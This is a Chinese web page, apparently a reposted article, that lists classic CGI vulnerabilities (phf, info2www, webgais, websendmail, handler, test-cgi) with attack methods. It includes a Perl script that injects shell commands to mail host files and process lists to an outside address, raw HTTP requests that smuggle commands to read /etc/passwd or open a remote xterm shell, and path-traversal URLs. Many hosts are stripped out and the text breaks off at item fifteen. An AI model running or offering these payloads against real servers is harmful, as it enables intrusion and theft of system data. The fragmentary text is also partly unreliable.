常见27个CGI漏洞攻击方法-电脑资料

2024年6月14日发(作者：)

常见27个ＣＧＩ漏洞攻击方法-电脑资料

一.phf漏洞

这个phf漏洞好象是最经典了,几乎所有的文章都会介绍,可以执行

服务器的命令,如显示/etc/passwd:

但是我们还能找到它吗?

二. 2.0beta10或更早版本的漏洞

可以读nobody权限的所有文件.

/etc/security/passwd等.

三.whois_

四.faxsurvey

五.

如果服务器上有,所有人可以以http守护进程的权

限执行命令.

#!/usr/bin/perl

$URL='/a/';

# please _DO_ _modify_ this

$EMAIL='****************.ro,root';#please_DO__modi

fy_ this

if ($ARGV[0]) { $CMD=$ARGV[0];}else{

$CMD="(ps ax;cd ..;cd ..;cd ..;cd etc;cat hosts;set)|mail ${EM

AIL} -sanothere_one";

}$text="${URL}/;IFS=8;${CMD};echo|";$text =~ s/ /${IFS}/

g;#print "$textn";

system({"wget"} "wget", $text, "-O/dev/null");

system({"wget"} "wget", $text, "-O/dev/null");

#system({"lynx"} "lynx", $text); #如果没有wget命令也可以用

lynx

#system({"lynx"} "lynx", $text);

六.一些版本(1.1)的info2www的漏洞

$ REQUEST_METHOD=GET ./info2www '

(../../../../../../../bin/mail jami

$

You have new mail.

$

说实在我不太明白.

七.

lynx -source

'/cgi-

bin/?/../../../../etc/motd'

还有另外一个漏洞可以执行命令

or

lynx -dump

八.wrap

九.www-sql

可以让你读一些受限制的页面如:

被要求输入帐号和口令.而有www-sql就不必了:

十.view-source

十一.campas

十二.webgais

telnet 80

POST /cgi-bin/webgais HTTP/1.0

Content-

length: 85 (replace this with the actual length of the

"exploit"line)

query=';mail+drazvan@

echo'&output=subject&domain=paragraph

十三.websendmail

telnet 80

POST /cgi-bin/websendmail HTTP/1.0

Content-

length: xxx (should be replaced with the actual length of the

string passed to the server, in this case xxx=90)

receiver=;mail+your_address@

十四.handler

telnet 80

GET /cgi-

bin/handler/useless_shit;cat /etc/passwd|?data=DownloadHTTP

/1.0

or

GET /cgi-bin/handler/blah;xwsh

|?data=Download

or

GET /cgi-bin/handler/;xterm-displaydanish:0-

e/bin/sh|?data=Download

注意,cat后是TAB键而不是空格,服务器会报告不能打开

useless_shit,但仍旧执行下面命令.

十五.test-cgi

CGI/1.0 test script report:

argc is 0. argv is .

SERVER_SOFTWARE = NCSA/1.4B

SERVER_NAME =

GATEWAY_INTERFACE = CGI/1.1

SERVER_PROTOCOL = HTTP/1.0

SERVER_PORT = 80

REQUEST_METHOD = GET

HTTP_ACCEPT = text/plain, application/x-

html, application/html,

-display

text/html, text/x-html

PATH_INFO =

PATH_TRANSLATED =

SCRIPT_NAME = /cgi-bin/test-cgi

QUERY_STRING = whatever

REMOTE_HOST =

REMOTE_ADDR = 200.200.200.200

REMOTE_USER =

AUTH_TYPE =

CONTENT_TYPE =

CONTENT_LENGTH =

得到一些http的目录

这招好象并不管用.

还可以这样试

GET /cgi-bin/test-cgi?* HTTP/1.0

GET&n